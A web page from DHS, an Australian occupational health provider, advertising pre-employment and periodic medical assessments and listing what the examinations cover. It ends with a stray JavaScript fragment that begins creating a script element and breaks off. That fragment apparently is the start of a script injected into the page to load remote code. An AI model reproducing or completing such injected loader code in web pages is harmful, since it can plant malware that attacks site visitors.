DHS offers comprehensive and detailed pre-employment medical examinations, pre-placement and periodic medical assessments that can be tailored to suit your business needs.
Whatever the industry, the health and safety of your staff is essential and is key to optimising company productivity.
The benefits of conducting pre-employment medical assessments include:
- A safer working environment
- Reduction in workplace injuries
- Minimised downtime
- Reduction in WorkCover claims and insurance costs
- Matching the capacity of the employee with the role
- Overall recruitment cost and risk reduction.
Pre-employment medical assessments performed by healthcare professionals across Australia are supported by an innovative IT system designed and developed by DHS specifically for occupational health requirements that ensure timely, accurate and optimal quality in health data management and communications. Pre-employment medical assessments are conducted to Australian state or territory WorkSafe requirements in WA, SA, NT, QLD, NSW, VIC, ACT and TAS.
Our pre-employment medical examination usually includes the following components:
- Height, weight, body mass index (BMI)
- Cardiovascular examination (heart check, blood pressure, pulse)
- Full musculoskeletal examination including comprehensive range of movement
- Central nervous system examination
- Examination for hernias and other abdominal abnormalities
- Urinalysis for diabetes or kidney / bladder disorders
- Respiratory examination
- Vision assessment including colour blindness
Other specific pre-employment medical examination requirements may include:
- Audiometry (hearing test, including WorkCover WA audio compliance)
- Spirometry (lung function test)
- Instant drug and alcohol screening
- Work fitness assessments
- Periodic and exit medical assessments
- Statutory and code of practice screening
- Specialised medicals
- Rail & Driver medicals
- Aviation medicals
var d=document;var s=d.createElement(‘script’);